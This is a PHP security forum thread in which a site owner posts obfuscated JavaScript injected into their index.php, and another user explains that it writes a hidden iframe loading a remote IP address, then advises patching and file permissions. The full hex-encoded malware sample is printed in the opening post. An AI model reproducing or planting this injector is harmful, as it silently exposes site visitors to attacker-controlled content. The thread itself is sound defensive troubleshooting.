help with security

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
wpsd2006
Forum Commoner
Posts: 66
Joined: Wed Jan 07, 2009 12:43 am

help with security

Post by wpsd2006 »

I got some strange malware in my site
i don't know who put there and it's strange

someone put a strange script in my index.php
first how the hell they able to do that
i got this malware twice..

below my </html>

i got this kind of code which i thing randomly done

Code: Select all

<script>function v4971588c7b742(v4971588c7bf11){ function v4971588c7c6e1 () {return 16;}
return(parseInt(v4971588c7bf11,v4971588c7c6e1()));}function v4971588c7d681(v4971588c7de50){ function
 v4971588c7f5c0 () {var v4971588c7fd91=2; return v4971588c7fd91;} var v4971588c7e620='';for(v4971588c7edf0=0; 
v4971588c7edf0<v4971588c7de50.length; v4971588c7edf0+=v4971588c7f5c0()){ 
v4971588c7e620+=(String.fromCharCode(v4971588c7b742(v4971588c7de50.substr(v4971588c7edf0, 
v4971588c7f5c0()))));}return v4971588c7e620;} 
document.write(v4971588c7d681('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E74
2E777269746528273C696672616D65206E616D653D313831207372633D5C27687474703A2F2F35382E36352E3233322E32352F6
36F756E7465722F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31333330292B27325C27207769647468
3D35206865696768743D323636207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F
5343524950543E'));</script>
last time i got this but shorter
can someone tell me how to prevent this from happening
the site only have a link ( still beta )
and connect to a forum smf and gallery2
and it used startlogic as webhosting

they shouldn't be able to hack the file ( i mean write the file in the webhosting folder right )
oh and for index.php which chmod should i use ?

can someone tell me how to prevent this
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: help with security

Post by kaisellgren »

Hi.

The script you have will create a new iframe to your site that uses a source URL of http://58.65.232.25/counter/?X where X is a random number.

There is a security hole somewhere in your scripts. Very hard to know where, because I have no idea what scripts, what versions, etc you got there. Your best bet is to update all scripts to the latest versions. If you have written your own script then you should double check your code.

To prevent this, find your vulnerability. You could also CHMOD the files to something like 0400.
wpsd2006
Forum Commoner
Posts: 66
Joined: Wed Jan 07, 2009 12:43 am

Re: help with security

Post by wpsd2006 »

yeah found the problem
i use the old php smf it has a lot of security vulnerable
Post Reply